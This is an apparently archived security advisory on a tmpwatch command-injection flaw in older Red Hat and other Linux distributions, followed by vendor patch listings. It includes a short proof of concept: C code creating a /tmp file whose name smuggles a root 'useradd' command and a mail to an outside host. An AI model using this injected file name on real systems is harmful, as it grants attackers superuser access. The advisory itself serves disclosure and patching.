COMMAND
tmpwatch
SYSTEMS AFFECTED
tmpwatch 2.2, 2.5.1
PROBLEM
Following is based on a Internet Security Systems Security
Advisory. The tmpwatch utility is used in Red Hat Linux to remove
temporary files. This utility has an option to call the "fuser"
program, which verifies if a file is currently opened by a
process. The fuser program is invoked within tmpwatch by calling
the system() library subroutine. Insecure handling of the
arguments to this subroutine could potentially allow an attacker
to execute arbitrary commands.
This vulnerability may allow local attackers to compromise
superuser access if tmpwatch is used by the administrator in a
non-default manner.
Affected versions:
Red Hat Linux 7.0 (tmpwatch v2.5.1)
Red Hat Linux 6.2 (tmpwatch v2.2)
Use the 'rpm -q tmpwatch' command to verify which version is
installed. The tmpwatch package as well as the package containing
fuser are included in the default base installation. By default,
tmpwatch with the fuser option is not used in any package shipped
with the Red Hat distributions.
The tmpwatch tool removes files that have not been modified or
accessed within a specified amount of time. It was designed to
securely remove files by avoiding typical race condition
vulnerabilities. System administrators usually run this tool
periodically to remove old temporary files in world-writeable
directories.
The tmpwatch tool uses the --fuser or -s options to avoid removing
a file that is in an open state in another process. This option
uses the system() library subroutine to call the external program
/sbin/fuser with the file name being examined as an argument. The
system() subroutine spawns a shell to execute the command. An
attacker may create a file name containing shell metacharacters,
which could allow them to execute arbitrary commands if tmpwatch
with the fuser option is used to remove the file.
Source code comparison between the Red Hat Linux 6.2 and 7.0
tmpwatch packages suggests this vulnerability was recognized and
a fix was attempted. However, the fix is incorrect, and the
vulnerability is still exploitable.
Here is a simple example of Alexander Y. Yurchenko playing with
tmpwatch bug:
1. Execute following in /tmp
#include <stdio.h>
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
haks0r@somehost.com<blablabla";
if((f = fopen(filename, "a")) == 0) {
perror("Could not create file");
exit(1);
}
close(f);
}
2. cp /usr/sbin/adduser /tmp
3. Just wait for mail
SOLUTION
Do not use the --fuser or -s options with tmpwatch. Red Hat has
issued the following RPMs that contain fixes for this
vulnerability:
ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
For ImmunixOS:
http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
For Linux-Mandrake:
Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
The tmpwatch packages as shipped with SuSE distributions are not
vulnerable to the attacks as discussed on security forums,
initiated and discovered by zenith parsec.
All users of TSL should upgrade to the new rpm:
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm